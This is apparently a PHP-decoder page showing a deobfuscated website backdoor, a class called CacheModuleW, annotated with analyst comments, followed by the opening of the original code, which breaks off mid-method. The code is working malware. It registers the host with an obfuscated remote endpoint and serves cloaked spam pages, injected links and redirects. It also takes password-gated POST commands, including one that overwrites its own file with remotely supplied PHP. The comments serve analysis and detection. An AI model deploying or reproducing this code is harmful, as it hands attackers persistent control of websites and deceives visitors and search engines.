PHP Decode
<?php ini_set("display_errors", 1); ini_set("memory_limit", "256M"); ignore_user_abor..
Decoded Output download
<?php
// These three settings apply to the whole request of whichever script loads this file:
// errors are displayed, the memory limit is raised to 256M, and execution continues after
// the client disconnects.
ini_set("display_errors", 1);
ini_set("memory_limit", "256M");
ignore_user_abort(1);
/**
 * Decoded sample. Everything runs from the constructor, on every request of the script that
 * loads this file. As the methods below show, the class:
 *  - registers the host with a remote endpoint (install()),
 *  - keeps its state in a `cache_w` directory next to this file (setVars()),
 *  - outputs remotely supplied pages, injected links or redirect code depending on whether the
 *    visitor is classified as a bot (pageActions()),
 *  - accepts password-gated POST commands, one of which overwrites this file (renewClient()).
 */
class CacheModuleW
{
// Client version; checkRequest() compares it with the POSTed "ver" to decide on renewClient().
private $ver = "4.5";
// Visitor IP, User-Agent and Referer as captured by setVars().
private $ip;
private $ua;
private $ref;
// POST field name that makes the constructor exit early; goPost() appends it on loopback fetches.
private $postVar = "nocache";
// Copy of $_POST.
private $post;
// Remote endpoint: encoded when passed in, decoded by setVars() via dcdAu().
private $au;
// md5 of the lower-cased server name with "www." removed; sent as "rid" in every remote call.
private $rid;
private $protocol = "http://";
private $currentUrl;
// md5-based key of the current URL (makeHash()); also used as a file name inside $cacheDir.
private $currentHash;
// On-disk state, all under dirname(__FILE__) . "/cache_w" (see setVars()):
// pFile = pfile.php (command password), uFile = ufile (URL/keyword list), rFile = rfile (redirect config).
private $cacheDir;
private $pFile;
private $uFile;
private $rFile;
private $currentKeyword = "";
// Marker file "check"; its absence triggers the install() call-home.
private $checkFile;
// Set by isDoor() when the current URL is listed in uFile with a keyword.
private $isDoor = false;
// Set by redirActions() when the visitor matches the bot IP/User-Agent lists.
private $isBot = false;
private $redirType = "";
private $redirUrl = "";
private $redirCode = "";
/**
 * Password loaded from pFile by checkPostPass() once the POSTed value matches it.
 *
 * @var mixed
 */
private $postPass;
/**
 * Entry point: the complete request flow runs here. The `return false` / `return true`
 * statements only leave the constructor early; PHP discards a constructor's return value,
 * so `new CacheModuleW(...)` still yields an object and the host script carries on.
 *
 * @param string $au Encoded remote endpoint; decoded by dcdAu() inside setVars().
 */
public function __construct($au)
{
// Loopback guard: goPost(..., true) adds nocache=yes, so the module's own fetch of the host
// page (showLinks()) is answered by the unmodified site.
if (!empty($_POST[$this->postVar]) && $_POST[$this->postVar] === "yes") {
return false;
}
// The "qqq" prefix moves any match past offset 0 so stripos()'s result can be used as a boolean.
// Requests for wp-admin / wp-login.php are left untouched.
if(stripos("qqq".$_SERVER['REQUEST_URI'], "wp-admin") || stripos("qqq".$_SERVER['REQUEST_URI'], "wp-login.php")){
return false;
}
$this->au = $au;
// setVars() also returns false for a fixed list of crawler User-Agents, which disables the module for them.
if (!$this->setVars()) {
return false;
}
// First-run registration with the remote endpoint (no-op once cache_w/check exists).
$this->install();
// Any POST goes through the command handler; a POST without the correct postpass ends here
// and the host script handles the request normally.
if (!empty($this->post)) {
$this->checkRequest();
if (!$this->checkPostPass()) {
return false;
}
}
// Content/redirect logic only runs once a URL list has been stored by install().
if (file_exists($this->uFile)) {
$this->isDoor();
$this->checkRedir();
$this->redirActions();
$this->pageActions();
}
return true;
}
/**
 * Returns the HTML to output for a listed URL: the cached copy if present, otherwise a page
 * fetched from the remote endpoint (action=getpage) and then cached.
 *
 * @return string|false Page HTML, "" when nothing usable was obtained; gzinflate() may yield
 *                      false on a corrupt cache file.
 */
private function showPage()
{
// Cache entry: raw-deflated HTML stored as cache_w/<currentHash>.
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$page = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$page = gzinflate($page);
return $page;
}
$postPass = "";
// pFile is a PHP file written by savePass(); including it defines $postPass in this scope.
if (file_exists($this->pFile)) {
@include($this->pFile);
}
$params = "rid=" . $this->rid . "&action=getpage&keyword=" . urlencode($this->currentKeyword) . "&hash=" . $this->currentHash . "&url=" . urlencode($this->currentUrl) . "&postpass=" . $postPass;
$page = $this->goPost($this->au, $params);
$page = json_decode($page);
if (!empty($page)) {
// The md5 arrives in the same response as the content: it catches truncation/corruption,
// it does not authenticate the sender.
if ($page->md5 !== md5($page->content)) {
return "";
}
$page = $page->content;
// Only a response containing both "<body" and "<html" is accepted as a page.
if (
!stripos("qqq" . $page, "<body")
|| !stripos("qqq" . $page, "<html")
) {
return "";
}
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", gzdeflate($page));
return $page;
}
return "";
}
/**
 * Fetches the host's own page for the current URL and returns it with links injected.
 *
 * @return string Modified HTML, or "" if the fetch or the injection produced nothing.
 */
private function showLinks()
{
// Loopback request to this same site; the third argument adds nocache=yes so the
// constructor on that inner request exits before doing anything.
$page = $this->goPost($this->currentUrl, "", true);
if (empty($page)) {
return "";
}
$page = $this->placeLinks($page);
if (empty($page)) {
return "";
}
return $page;
}
/**
 * Inserts a set of anchor tags directly after the opening <body ...> tag of $page.
 * The set is read from cache_w/<currentHash> (JSON) when that file exists, otherwise drawn
 * at random from uFile and then cached so the same URL keeps the same links.
 *
 * @param string $page HTML of the host page.
 * @return string|false|null Modified HTML; false when no links are available
 *                           (preg_replace() itself returns null on a regex error).
 */
private function placeLinks($page)
{
$links = null;
$save = true;
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$links = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$links = json_decode($links);
$save = false;
}
if (empty($links)) {
$links = $this->getRandLinks();
}
if (empty($links)) {
return false;
}
if ($save === true) {
$this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", json_encode($links));
}
// ".*" is greedy and stops at a newline, so the capture runs to the last ">" on the line that
// holds "<body"; the links land after that point. Only the first match is replaced.
return preg_replace("/(<body.*>)/", "\$1" . implode($links), $page, 1);
}
/**
 * Decides what the visitor receives. Every branch that outputs something ends the request
 * with die(), so the host application never renders for that request.
 *
 *  - listed URL, visitor not classified as bot, redirect code present -> redirect code is echoed
 *  - listed URL otherwise                                          -> remote/cached page is echoed
 *  - unlisted URL, visitor classified as bot                       -> host page with injected links
 *  - unlisted URL, ordinary visitor                                -> nothing; the site behaves normally
 *
 * Because bots and ordinary visitors get different responses, comparing the same URL fetched
 * with a crawler User-Agent and with a browser User-Agent exposes the behaviour.
 */
private function pageActions()
{
if ($this->isDoor === true) {
// showPage() runs (and may call out / write cache) even when the redirect branch wins below.
$page = $this->showPage();
if ($this->isBot === false && !empty($this->redirCode)) {
echo $this->redirCode;
die();
}
if (!empty($page)) {
echo $page;
die();
}
} else {
if ($this->isBot === true) {
$page = $this->showLinks();
if (!empty($page)) {
echo $page;
die();
}
}
}
}
/**
 * Prepares $this->redirCode and classifies the visitor as bot / not bot.
 *
 * "kt" mode (listed URL only): the visitor's User-Agent, IP, keyword, referrer and URL are
 * POSTed to $this->redirUrl together with a token; the response decides both the redirect
 * body and the bot flag. Otherwise: placeholders in the stored redirect code are filled in
 * locally and the bot decision is made from the hard-coded IP and User-Agent lists below.
 */
private function redirActions()
{
if ($this->redirType === "kt" && $this->isDoor === true) {
// $this->ip is appended without urlencode(); it can originate from X-Forwarded-For (setVars()).
$ktRes = $this->goPost($this->redirUrl, "token=" . $this->redirCode . "&log=1&info=1&user_agent=" . urlencode($this->ua) . "&ip=" . $this->ip . "&keyword=" . urlencode($this->currentKeyword) . "&referrer=" . urlencode($this->ref) . "&source=" . urlencode($this->currentUrl));
$ktRes = json_decode($ktRes);
if (!empty($ktRes->body)) {
$this->redirCode = $ktRes->body;
} else {
$this->redirCode = "";
}
// NOTE(review): $ktRes->info is dereferenced without a null check; a failed request or
// non-JSON reply raises warnings here (display_errors is switched on at the top of the file).
if ($ktRes->info->is_bot === true || $ktRes->body == "bot") {
$this->isBot = true;
}
} else {
if (!empty($this->redirCode)) {
// Request-derived values (Referer, server name, URL) are substituted into the code that
// pageActions() later echoes, with no output encoding.
$this->redirCode = str_ireplace("[REFERER]", $this->ref, $this->redirCode);
$this->redirCode = str_ireplace("[DOMAIN]", $_SERVER["SERVER_NAME"], $this->redirCode);
$this->redirCode = str_ireplace("[CURURL]", $this->currentUrl, $this->redirCode);
$this->redirCode = str_ireplace("[KEYWORD]", $this->currentKeyword, $this->redirCode);
$this->redirCode = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $this->currentKeyword), $this->redirCode);
$this->redirCode = str_ireplace("[PLUSKEY]", str_ireplace(" ", "+", $this->currentKeyword), $this->redirCode);
}
$is_bot = "";
// User-Agent patterns treated as crawlers/automated clients.
$user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i');
// IP patterns treated as bots. Each is anchored with ^...$ below, and "[0-9]" matches exactly
// one digit, so the range-style entries only match addresses whose remaining octets are single digits.
$stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69");
foreach ($stop_ips_masks as $k => $v) {
if (preg_match('#^' . $v . '$#', $this->ip)) {
$is_bot = "bot";
}
}
// Any User-Agent pattern hit is rewritten to a sentinel, then the sentinel is searched for.
if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $this->ua), '-ANGRYBOT-')) {
$is_bot = true;
}
// Loose comparison: both the string "bot" and boolean true satisfy it.
if ($is_bot == true) {
$this->isBot = true;
}
}
}
/**
 * Looks the current URL up in uFile (one JSON object per line with hash/url/keyword).
 * On a hash match with a non-empty keyword it sets $this->currentKeyword and $this->isDoor.
 *
 * @return bool true when a line with a matching hash was found (even if it had no keyword),
 *              false otherwise. The constructor ignores the return value.
 */
private function isDoor()
{
$handle = fopen($this->uFile, "r");
// Second lookup key: the URL with scheme and "www." removed, hashed without makeHash()'s own stripping.
$secondCurrentUrl = str_ireplace("http://", "", $this->currentUrl);
$secondCurrentUrl = str_ireplace("https://", "", $secondCurrentUrl);
$secondCurrentUrl = str_ireplace("www.", "", $secondCurrentUrl);
$secondHash = $this->makeHash($secondCurrentUrl, true);
// var_dump($this->currentUrl, $secondCurrentUrl, $secondHash, file($this->uFile));
while (!feof($handle)) {
$oneLine = fgets($handle);
$oneLine = trim($oneLine);
$oneLine = json_decode($oneLine);
if (!empty($oneLine)) {
if ($oneLine->hash === $this->currentHash || $oneLine->hash === $secondHash) {
fclose($handle);
if(!empty($oneLine->keyword)){
$this->currentKeyword = urldecode($oneLine->keyword);
$this->isDoor = true;
}
return true;
}
}
}
fclose($handle);
return false;
}
/**
 * POST command handler, reached for every request that carries POST data.
 *
 * A non-empty "check" field always ends the request with a JSON reply; `{"result":1}` is
 * returned even without a password, so the reply alone reveals that the module is present.
 * With a correct "postpass" the handler can additionally replace this file (renewClient()),
 * replace the redirect config (changeRedirect()) and report host data.
 *
 * @return false|null false when a postpass was supplied but wrong; otherwise no value
 *                    (the "check" path does not return, it calls die()).
 */
private function checkRequest()
{
if (!empty($this->post["check"])) {
$result = [
"result" => 1
];
if (!empty($this->post["postpass"])) {
if (!$this->checkPostPass()) {
return false;
}
// Version mismatch between the POSTed "ver" and $this->ver triggers a self-overwrite.
if ($this->ver !== $this->post["ver"]) {
if ($this->renewClient()) {
$result["renew"] = 1;
}
}
// Redirect config is refreshed when the caller's md5 differs from the stored file's md5.
if (file_exists($this->rFile) && !empty($this->post["redmd5"]) && $this->post["redmd5"] !== md5(file_get_contents($this->rFile))) {
if ($this->changeRedirect()) {
$result["changedred"] = 1;
}
}
$hostData = $this->getHostData();
if(!empty($hostData)){
$result["hostdata"] = $hostData;
}
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($result);
die();
}
}
/**
 * Builds the "hostdata" part of the check reply.
 *
 * @return array Empty unless a function named "execc" exists; in that case both fields are
 *               present but set to empty strings.
 */
private function getHostData()
{
$result = [];
// "execc" is not a PHP built-in, so this branch is normally skipped.
// NOTE(review): looks like a disabled or stubbed-out host fingerprinting step — no command is run here.
if (function_exists("execc")) {
$uname = "";
$hostname = "";
$result["uname"] = $uname;
$result["hostname"] = $hostname;
}
return $result;
}
/**
 * Downloads a new redirect configuration (action=checkredirect) and writes it to rFile.
 *
 * @return bool true when a body whose md5 matches the accompanying md5 field was written.
 */
private function changeRedirect()
{
$params = "rid=" . $this->rid . "&action=checkredirect&postpass=" . $this->postPass;
$redirect = $this->goPost($this->au, $params);
$data = json_decode($redirect);
if (empty($data)) {
return false;
}
// Checksum and body come from the same response: a corruption check, not authentication.
if ($data->md5 === md5($data->body)) {
$this->fileAction($this->rFile, "w+", $data->body);
return true;
}
return false;
}
/**
 * Self-update: downloads a body from the remote endpoint (action=renew) and overwrites
 * __FILE__ with it. Whatever the endpoint returns becomes the PHP code executed on the next
 * request, so the code on disk can differ from this sample; a static file hash identifies
 * one version only.
 *
 * @return bool true when the file was overwritten.
 */
private function renewClient()
{
$params = "rid=" . $this->rid . "&action=renew&postpass=" . $this->postPass;
$page = $this->goPost($this->au, $params);
$data = json_decode($page);
if (empty($data)) {
return false;
}
// The md5 is delivered with the body and goPost() disables TLS verification, so this check
// only rules out a damaged download; it does not establish who sent the code.
if ($data->md5 === md5($data->body)) {
$this->fileAction(__FILE__, "w+", $data->body);
return true;
}
return false;
}
/**
 * Loads the redirect configuration from rFile (JSON with url, data and type fields) into
 * $this->redirType, $this->redirUrl (decoded with dcdAu()) and $this->redirCode.
 *
 * @return false Always false, including after a successful load; the caller ignores it.
 */
private function checkRedir()
{
if (file_exists($this->rFile)) {
$redirCode = file_get_contents($this->rFile);
$redirCode = json_decode($redirCode);
if (empty($redirCode)) {
return false;
}
if (empty($redirCode->url) || empty($redirCode->data)) {
return false;
}
// NOTE(review): ->type is read without an isset() check.
if ($redirCode->type === "kt") {
$this->redirType = "kt";
}
$this->redirUrl = $this->dcdAu($redirCode->url);
$this->redirCode = $redirCode->data;
}
return false;
}
/**
 * Decodes the endpoint, captures request metadata and derives all on-disk paths.
 *
 * Files used by the module, all inside dirname(__FILE__) . "/cache_w":
 *   check, pfile.php, ufile, rfile, plus one file per URL named by its md5 hash.
 * Their presence next to a PHP file is a file-system indicator of this module.
 *
 * @return bool false when the endpoint decodes to an empty value or the User-Agent matches
 *              one of the listed crawlers (the module then does nothing for that request).
 */
private function setVars()
{
$this->au = $this->dcdAu($this->au);
if (empty($this->au)) {
return false;
}
// X-Forwarded-For is a client-supplied header and is preferred over REMOTE_ADDR here, so the
// IP used for bot classification in redirActions() is whatever the client claims.
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$this->ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$this->ip = $_SERVER['REMOTE_ADDR'];
} else {
$this->ip = "";
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$this->ua = $_SERVER['HTTP_USER_AGENT'];
} else {
$this->ua = "";
}
// Requests whose User-Agent contains one of these crawler names get the unmodified site.
if(
stripos("qqq".$this->ua, "mj12bot.com")
|| stripos("qqq".$this->ua, "seostar.co/robot")
|| stripos("qqq".$this->ua, "AhrefsBot")
|| stripos("qqq".$this->ua, "DataForSeoBot")
|| stripos("qqq".$this->ua, "The Knowledge AI")
|| stripos("qqq".$this->ua, "SiteLockSpider")
) {
return false;
}
if (!empty($_SERVER['HTTP_REFERER'])) {
$this->ref = $_SERVER['HTTP_REFERER'];
} else {
$this->ref = "";
}
$this->post = $_POST;
// Site identifier sent to the endpoint: md5 of the host name without "www.".
$this->rid = md5(str_ireplace("www.", "", strtolower($_SERVER['SERVER_NAME'])));
if (isset($_SERVER['HTTPS'])) {
$this->protocol = "https://";
}
// Normalised URL: lower-cased, trailing "/" removed, URL-decoded.
$this->currentUrl = $this->protocol . strtolower($_SERVER['SERVER_NAME']) . strtolower($_SERVER['REQUEST_URI']);
$this->currentUrl = rtrim($this->currentUrl, "/");
$this->currentUrl = urldecode($this->currentUrl);
$this->currentHash = $this->makeHash($this->currentUrl);
$this->cacheDir = dirname(__FILE__) . "/cache_w";
$this->checkFile = $this->cacheDir . "/check";
$this->pFile = $this->cacheDir . "/pfile.php";
$this->uFile = $this->cacheDir . "/ufile";
$this->rFile = $this->cacheDir . "/rfile";
return true;
}
/**
 * Stores the redirect configuration received during install() as JSON in rFile.
 *
 * @param mixed $data Decoded "redirect" value from the install response.
 */
private function saveRedirect($data)
{
$this->fileAction($this->rFile, "w+", json_encode($data));
}
/**
 * First-run registration. When cache_w/check does not exist yet, creates the directory and
 * marker file, then POSTs the site id, current URL, the absolute path of this file and an
 * SSL flag to the remote endpoint (action=install). The response may carry a command
 * password, a URL/keyword list and a redirect configuration, each written to disk.
 *
 * @return bool false for .pdf/.xml URLs (nothing is done), true otherwise.
 */
private function install()
{
// ".pdf" is tested twice; the third test repeats the first.
if (stripos("qqq" . $this->currentUrl, ".pdf") || stripos("qqq" . $this->currentUrl, ".xml") || stripos("qqq" . $this->currentUrl, ".pdf")) {
return false;
}
if (!file_exists($this->checkFile)) {
mkdir($this->cacheDir);
$this->fileAction($this->checkFile, "w+", time());
// Continue only if the marker was actually written, i.e. the directory is writable.
if (file_exists($this->checkFile)) {
$isSecure = "";
if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
$isSecure = "yes";
}
// url and path are concatenated without urlencode(); __FILE__ discloses the server-side path.
$params = "rid=" . $this->rid . "&action=install&url=" . $this->currentUrl . "&path=" . __FILE__."&ssl=".$isSecure;
$incomeData = $this->goPost($this->au, $params);
$incomeData = json_decode($incomeData);
// $result is assigned here and below but never read in this method.
$result = [
"type" => "error"
];
if (!empty($incomeData)) {
if (!empty($incomeData->postpass)) {
$this->savePass($incomeData->postpass);
}
if (!empty($incomeData->urls)) {
// One JSON object per line is appended to uFile: hash, url-encoded url, url-encoded keyword.
foreach ($incomeData->urls as $urlData) {
$toSave = [
"hash" => $this->makeHash($urlData->url),
"url" => urlencode($urlData->url),
"keyword" => urlencode($urlData->keyword)
];
$this->fileAction($this->uFile, "a+", json_encode($toSave) . "
");
}
$result["type"] = "fromurls";
}
if (!empty($incomeData->redirect)) {
$this->saveRedirect($incomeData->redirect);
}
}
}
}
return true;
}
/**
 * Produces the md5 key used to match URLs against uFile and to name cache files.
 *
 * @param string $string URL to hash; a trailing "/" is removed first.
 * @param bool   $noStr  When true, the scheme/"www." stripping is skipped.
 * @return string md5 hex digest of the url-encoded string.
 */
private function makeHash($string, $noStr = false)
{
$string = rtrim($string, "/");
if($noStr === false) {
// The second needle is "https//" (no colon), so it never matches an "https://" prefix;
// only "http://" and "www." are actually stripped here.
$string = str_ireplace(
["http://", "https//", "www."],
"",
$string
);
}
return md5(urlencode($string));
}
/**
 * Sends an HTTP POST and returns the response body. Used for every call to the remote
 * endpoint and for the loopback fetch of the host's own pages.
 *
 * Observable on the network as outbound POSTs from the web server's PHP process carrying a
 * desktop-browser User-Agent (rUA()).
 *
 * @param string $url     Target URL.
 * @param string $params  URL-encoded form body; a trailing "&" is trimmed.
 * @param bool   $nocache When true, appends "<postVar>=yes" (i.e. nocache=yes).
 * @return string|bool Response body, or false on failure.
 */
public function goPost($url, $params, $nocache = false)
{
$params = rtrim($params, '&');
if ($nocache === true) {
$params .= "&" . $this->postVar . "=yes";
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $this->rUA());
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// Passing a body via CURLOPT_POSTFIELDS makes the request a POST.
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_TIMEOUT, 40);
// Certificate and host-name verification are both switched off: responses, including the
// code written by renewClient(), are accepted from any TLS peer.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($ch);
curl_close($ch);
} else {
// Fallback without cURL: stream-context POST, no custom User-Agent and no timeout set here.
$output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params))));
}
return $output;
}
/**
 * Picks a random handful (4 to 6) of entries from uFile and renders them as anchor tags.
 *
 * @return array|false List of "<a href='...'>keyword</a> " strings; false when uFile is missing.
 */
private function getRandLinks()
{
if (!file_exists($this->uFile)) {
return false;
}
$links = [];
$linesIndArr = array();
$n = 1;
// Pass 1: collect line numbers, counted from 1.
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (fgets($handle) !== false) {
$linesIndArr[] = $n++;
}
}
fclose($handle);
$linesIndArr = $this->shArr($linesIndArr);
$linesIndArr = array_slice($linesIndArr, 0, rand(4, 6));
// Pass 2: $i counts from 0 while the chosen numbers count from 1, so the first line can
// never be selected and a chosen number equal to the line count matches nothing.
$i = 0;
$handle = fopen($this->uFile, "r");
while (!feof($handle)) {
if (count($links) == count($linesIndArr)) {
break;
}
$line = fgets($handle);
if ($line !== false && in_array($i, $linesIndArr)) {
$link = json_decode(trim($line));
if (!empty($link)) {
// url and keyword come from the remote endpoint (install()) and are emitted without HTML escaping.
$link = "<a href='" . urldecode($link->url) . "'>" . urldecode($link->keyword) . "</a> ";
$links[] = $link;
}
}
$i++;
}
fclose($handle);
return $links;
}
/**
 * Decodes an obfuscated endpoint string. Declared without a visibility keyword, so it is public.
 *
 * Scheme: every decimal digit d is replaced by (d - 3) mod 10, all other characters are kept;
 * the result is base64-decoded and then URL-decoded. Applying the same three steps offline to
 * the string stored in a sample yields the endpoint URL for blocklists and egress-log searches.
 *
 * @param string $au Encoded value.
 * @return string Decoded value (empty if base64_decode() fails).
 */
function dcdAu($au)
{
$goodservurl = array();
foreach (str_split($au) as $onechar) {
if (is_numeric($onechar)) {
// Digits 3-9 map to 0-6; digits 0-2 wrap around to 7-9.
if ($onechar >= 3) {
$onechar = $onechar - 3;
} else {
$onechar = $onechar + 10 - 3;
}
}
$goodservurl[] = $onechar;
}
return urldecode(base64_decode(implode($goodservurl)));
}
/**
 * Persists the command password as a PHP file (cache_w/pfile.php) that later code include()s.
 *
 * $pass is taken from the install response and concatenated into a single-quoted PHP string
 * literal without escaping, so the remote side controls the contents of a file that is
 * executed by showPage() and checkPostPass().
 *
 * @param string $pass Password value from the install response.
 */
private function savePass($pass)
{
$this->fileAction($this->pFile, "w+", "<?php \$postPass = '" . $pass . "'; ?>");
}
/**
 * Returns one of eight hard-coded desktop browser User-Agent strings, chosen by shuffling
 * the list; goPost() sends it on every cURL request.
 *
 * @return string User-Agent header value.
 */
private function rUA()
{
$uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");
$uas = $this->shArr($uas);
return $uas[0];
}
/**
 * Returns a shuffled copy of $arr (PHP passes arrays by value, so the caller's array is untouched).
 *
 * @param array $arr Values to shuffle.
 * @return array Shuffled values, re-indexed from 0 by shuffle().
 */
private function shArr($arr)
{
// Reseeds the global generator from the current time on every call.
srand((float)microtime() * 1000000);
shuffle($arr);
return $arr;
}
/**
 * Authenticates a POST command: the "postpass" field must equal the $postPass value defined
 * by including cache_w/pfile.php. On success the value is kept in $this->postPass for the
 * follow-up calls to the remote endpoint.
 *
 * @return bool true only when a non-empty postpass was POSTed and matches the stored one.
 */
private function checkPostPass()
{
if (empty($this->post["postpass"])) {
return false;
}
if (file_exists($this->pFile)) {
// include() executes pfile.php; errors are suppressed with "@".
@include($this->pFile);
if (!empty($postPass)) {
// Plain === string comparison (not hash_equals()).
if ($this->post["postpass"] === $postPass) {
$this->postPass = $postPass;
return true;
}
}
}
return false;
}
/**
 * Builds a string of $length characters drawn from a-z and 0-9 using rand().
 * Not called anywhere in the class as shown.
 *
 * @param int $length Number of characters.
 * @return string
 */
private function randString($length)
{
$str = "";
$chars = "abcdefghijklmnopqrstuvwxyz0123456789";
$size = strlen($chars);
for ($i = 0; $i < $length; $i++) {
$str .= $chars[rand(0, $size - 1)];
}
return $str;
}
/**
 * Single write primitive behind every file the module creates or overwrites
 * (cache entries, check, pfile.php, ufile, rfile and, via renewClient(), this file itself).
 *
 * @param string $path Target path.
 * @param string $mode fopen() mode; callers use "w+" (truncate) and "a+" (append).
 * @param mixed  $data Content to write.
 * @return bool false when the file cannot be opened; true otherwise (fwrite()'s result is not checked).
 */
private function fileAction($path, $mode, $data)
{
$fod = fopen($path, $mode);
if (!$fod) {
return false;
}
fwrite($fod, $data);
fclose($fod);
return true;
}
}
// Obfuscated remote endpoint. dcdAu() recovers it by shifting every digit down by 3 (mod 10),
// base64-decoding and URL-decoding; the decoded URL is the network indicator for this sample.
$au = "aHR3cCUzQSUyRiUyRndvcmxkdHJhZmZpY6JvdXRlLnRvcCUyRmZhcGQyJTJGYXBpJTJGd52yaw==";
// Instantiation is the trigger: the constructor runs the full flow on every request.
new CacheModuleW($au);
Original Code
<?php
ini_set("display_errors", 1);
ini_set("memory_limit", "256M");
ignore_user_abort(1);
class CacheModuleW
{
private $ver = "4.5";
private $ip;
private $ua;
private $ref;
private $postVar = "nocache";
private $post;
private $au;
private $rid;
private $protocol = "http://";
private $currentUrl;
private $currentHash;
private $cacheDir;
private $pFile;
private $uFile;
private $rFile;
private $currentKeyword = "";
private $checkFile;
private $isDoor = false;
private $isBot = false;
private $redirType = "";
private $redirUrl = "";
private $redirCode = "";
/**
* @var mixed
*/
private $postPass;
public function __construct($au)
{
if (!empty($_POST[$this->postVar]) && $_POST[$this->postVar] === "yes") {
return false;
}
if(stripos("qqq".$_SERVER['REQUEST_URI'], "wp-admin") || stripos("qqq".$_SERVER['REQUEST_URI'], "wp-login.php")){
return false;
}
$this->au = $au;
if (!$this->setVars()) {
return false;
}
$this->install();
if (!empty($this->post)) {
$this->checkRequest();
if (!$this->checkPostPass()) {
return false;
}
}
if (file_exists($this->uFile)) {
$this->isDoor();
$this->checkRedir();
$this->redirActions();
$this->pageActions();
}
return true;
}
private function showPage()
{
if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
$page = file_get_contents($this->cacheDir . "/" . $this->currentHash);
$page = gzinflate($page);
return $page;
}
$postPass = "";
if (file_exists($this->pFile)) {
@include($this->pFile);
}
